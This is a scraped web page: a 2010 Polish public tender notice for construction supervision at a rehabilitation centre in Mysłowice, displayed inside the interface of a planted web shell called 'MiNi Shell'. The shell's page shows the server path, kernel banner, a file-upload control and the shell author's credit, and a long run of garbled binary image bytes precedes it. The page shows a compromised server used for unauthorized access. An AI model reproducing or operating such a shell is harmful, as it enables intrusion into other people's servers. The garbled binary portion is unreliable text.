JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100127/24654-N-2010.html

<p class="kh_header"><b>Mysłowice: Pełnienie funkcji Inżyniera - zespołu inspektorów nadzoru inwestorskiego              w rozumieniu ustawy - Prawo Budowlane  w ramach projektu pn.:
Modernizacja PZOZ Ośrodka Rehabilitacyjno-Opiekuńczego w Mysłowicach nr UDA-RPSL.09.02.00-00-117-08-00 w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego Na lata 2007 - 2013. Priorytet IX Zdrowie i rekreacja
Działanie 9.2.Infrastruktura lecznictwa otwartego nr projektu - 127</b><br>
<b>Numer ogłoszenia: 24654 - 2010; data zamieszczenia: 27.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Publiczny Zakład Opieki Zdrowotnej Ośrodek Rehabilitacyjno-Opiekuńczy , ul. Laryska 7, 41-400 Mysłowice, woj. śląskie, tel. 32 316 01 61, faks 32 316 01 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzoz-oro.myslowice.bip.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Publiczny Zakład Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inżyniera - zespołu inspektorów nadzoru inwestorskiego              w rozumieniu ustawy - Prawo Budowlane  w ramach projektu pn.:
Modernizacja PZOZ Ośrodka Rehabilitacyjno-Opiekuńczego w Mysłowicach nr UDA-RPSL.09.02.00-00-117-08-00 w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego Na lata 2007 - 2013. Priorytet IX Zdrowie i rekreacja
Działanie 9.2.Infrastruktura lecznictwa otwartego nr projektu - 127.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem postępowania jest świadczenie na rzecz Zamawiającego specjalistycznej usługi polegającej na pełnieniu funkcji Inżyniera w zakresie zamówienia (kontraktu) na wykonanie dokumentacji projektowej i na wykonanie robót budowlanych przez wykonawcę wybranego w wyniku odrębnego postępowania przetargowego. Efektem finalnym pracy Inżyniera jest zapewnienie, że Zamawiający otrzymuje ukończone inwestycje wynikające z ww. projektu zgodnie z wymogami zamówienia (kontraktu) na wykonanie dokumentacji projektowej i na wykonanie robót budowlanych, zaś wykonujący zamówienie (kontrakt) zostaną odpowiednio wynagrodzeni. Istotne jest sporządzenie odpowiednich raportów z przebiegu inwestycji, które pozwolą na rozliczenie otrzymanych środków z Europejskiego Funduszu Rozwoju Regionalnego na realizację projektu pod nazwą: Modernizacja PZOZ Ośrodka Rehabilitacyjno-Opiekuńczego w Mysłowicach nr UDA-RPSL.09.02.00-00-117/08-00 w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013 Priorytet IX Zdrowie i rekreacja, Działanie 9.2. Infrastruktura lecznictwa otwartego nr projektu - 127. Szczegółowy opis przedmiotu zamówienia przedstawiony został w Części III niniejszej SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.80.00-8, 71.24.70.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 13.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca (Inżynier) zobowiązany jest zabezpieczyć swą ofertę wadium            w wysokości: 6300,00 PLN (Słownie: sześć tysięcy trzysta  złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)	posiadać uprawnienia do wykonywania działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia oraz nie podlegać wykluczeniu z postępowania na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. Nr 19, poz. 177 z późn. zm). W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć następujące dokumenty (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
2)	posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia, co oznacza, że Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie):
a)	wskazać, zgodnie z treścią załącznika nr 3 do IDW, do wykonania niniejszego zamówienia następujące osoby wraz, z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności podczas realizacji zamówienia, biegle posługujące się językiem polskim (w przypadku braku tej umiejętności wymagana jest obecność tłumacza): 

Ekspert kluczowy nr 1: Lider Zespołu - Inżynier Rezydent: Wykształcenie wyższe techniczne. Doświadczenie zawodowe: minimum 5-letnie doświadczenie w kierowaniu budową lub sprawowaniu nadzoru nad robotami - doświadczenie jako Inspektor Nadzoru Inwestorskiego lub Inżynier Kontraktu. Uprawnienia do  kierowania lub nadzorowania robót budowlanych w specjalności konstrukcyjno-budowlanej bez ograniczeń zgodnie z polskim prawem budowlanym. 

Ekspert kluczowy nr 2: Menedżer kosztów posiadający: wykształcenie wyższe techniczne lub ekonomiczne, minimum 5-letnie doświadczenie zawodowe związane z rozliczaniem kosztów inwestycji, w tym w szczególności w rozliczaniu  robót budowlanych.

Ekspert kluczowy nr 3: Inspektor Nadzoru - specjalista w zakresie robót instalacyjnych i sieci sanitarnych, posiadający: wykształcenie wyższe techniczne oraz minimum 5-letnie doświadczenie zawodowe w nadzorowaniu robót lub kierowaniu robotami budowlanymi, uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń zgodnie z polskim prawem budowlanym.

Ekspert kluczowy nr 4: Inspektor Nadzoru - specjalista w zakresie robót sieci, instalacji, urządzeń elektrycznych i elektroenergetycznych, posiadający: wykształcenie wyższe techniczne oraz minimum 5-letnie doświadczenie zawodowe w nadzorowaniu robót lub kierowaniu robotami budowlanymi, uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, bez ograniczeń zgodnie z polskim prawem budowlanym.
b) potwierdzi wykonanie w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia (licząc od daty przekazania ogłoszenia o zamówieniu do Dziennika Urzędowego Unii Europejskiej), a jeżeli okres prowadzenia działalności jest krótszy to  w tym okresie, co najmniej 1 usługi podobnej (odpowiadającej swoim rodzajem i wartością) do niniejszego zamówienia. Przez usługę podobną należy rozumieć realizację kontraktu usługowego spełniającego łącznie następujące warunki: zawierającego wykonanie pełnienia funkcji Inżyniera dla zadań realizowanych według warunków niniejszego zamówienia (kontraktu) o wartości nadzorowanych robót netto, co najmniej 1.000.000,00 PLN. Jeżeli kwota wyżej wymieniona w niniejszym punkcie podana będzie w innej walucie niż PLN, Zamawiający w celu sprawdzenia spełnienia warunków przez Wykonawcę dokona ich przeliczenia na PLN według kursu NBP na dzień, w którym ukazało się ogłoszenie o zamówieniu w Dzienniku Urzędowym Unii Europejskiej.
3) znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia. W szczególności Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa): 
a) posiadać środki finansowe w wysokości co najmniej 200 000,00 PLN lub posiadać zdolność kredytową w wysokości co najmniej 200 000,00 PLN.  
b) posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 200 000,00 PLN (łącznie dla Wykonawców składających ofertę wspólną). 
Jeżeli kwoty w dokumentach stanowiących potwierdzenie warunków wymienionych w pkt.3) a), b), podane będą w innej walucie niż PLN,  Zamawiający w celu sprawdzenia spełnienia warunków przez Wykonawcę dokona ich przeliczenia na PLN według kursu NBP na dzień, w którym ukazało się ogłoszenie o zamówieniu w Dzienniku Urzędowym Unii Europejskiej..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
b) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 u.p.z.p., wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
c) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 u.p.z.p., wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
d) aktualne zaświadczenia właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
e) oświadczenie, sporządzone według wzoru stanowiącego załącznik nr 2 do IDW, o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 44 w zw. z art. 22 ust. 1 pkt 1-4 ustawy z dnia 29 stycznia 2004 r. prawo zamówień publicznych (Dz. U. Nr 19, poz. 177 ze zm.).
- wykaz osób wskazanych do wykonania niniejszego zamówienia sporządzony według wzoru stanowiącego załącznik nr 3 do IDW.
- wykaz wykonanych (rozpoczętych i zakończonych) usług sporządzony wg wzoru stanowiącego załącznik nr 4 do IDW, wraz z dokumentami (np. referencjami) potwierdzającymi należyte wykonanie zamówienia. Wykonawca jest zobowiązany dostarczyć dokument potwierdzający należyte wykonanie wskazanych w tabeli załącznika nr 4 usług. Brak dokumentu lub dokument nie potwierdzający należytego wykonania danej usługi skutkuje nie zaliczeniem przez Zamawiającego wykonania tej usług. 
- oświadczenie stwierdzające, że wskazane w pkt. 3)b) osoby, które będą wykonywać niniejsze zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
- Wykonawca lub Wykonawcy (przedmiotowe dokumenty składają wszyscy Wykonawcy składający ofertę wspólnie) zobowiązani są przedłożyć informację z banku, lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
- Wykonawca lub Wykonawcy (przedmiotowe dokumenty składają wszyscy Wykonawcy składający ofertę wspólnie) musi złożyć polisę lub w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 200 000,00 PLN (łącznie dla Wykonawców składających ofertę wspólną).

Stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009r. (DZ. U. z 2009 r. Nr 226, poz. 1817) w sprawie rodzaju dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane:
1)	jeżeli Wykonawca (Inżynier) ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w:
      - pkt. 1)a)c)d) Tabeli z pkt. 9 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)  nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
c)  nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
       - pkt. 1)b) Tabeli z pkt. 9 składa zaświadczenie właściwego organu sądowego
lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 u.p.z.p.
2)	Dokumenty, o których mowa w pkt. 9.2.1) tiret 1 lit.  a i c oraz w pkt. 9.2.1) tiret 2, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument o którym mowa w pkt. 9.2.1) tiret 1 lit.  b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3)	Jeżeli w kraju pochodzenia osoby, lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 9.2.1), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca (Inżynier) ma siedzibę lub miejsce zamieszkania. Zapisy zawarte w pkt. 9.2.2) stosuje się odpowiednio.
4)	Dokumenty sporządzone w języku obcym Wykonawca (Inżynier) powinien złożyć wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę (Inżyniera)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pzoz-oro.myslowice.bip.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PZOZ Ośrodek Rehabilitacyjno - Opiekuńczy, ul. Chrzanowska 6, 41-404 Mysłowice (Polska), tel./fax. (032) 316-01-60, Sekretariat - I piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2010 godzina 10:00, miejsce: Ofertę należy złożyć w PZOZ Ośrodek Rehabilitacyjno - Opiekuńczy, ul. Chrzanowska 6, 41-404 Mysłowice (Polska), tel./fax. (032) 316-01-60.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com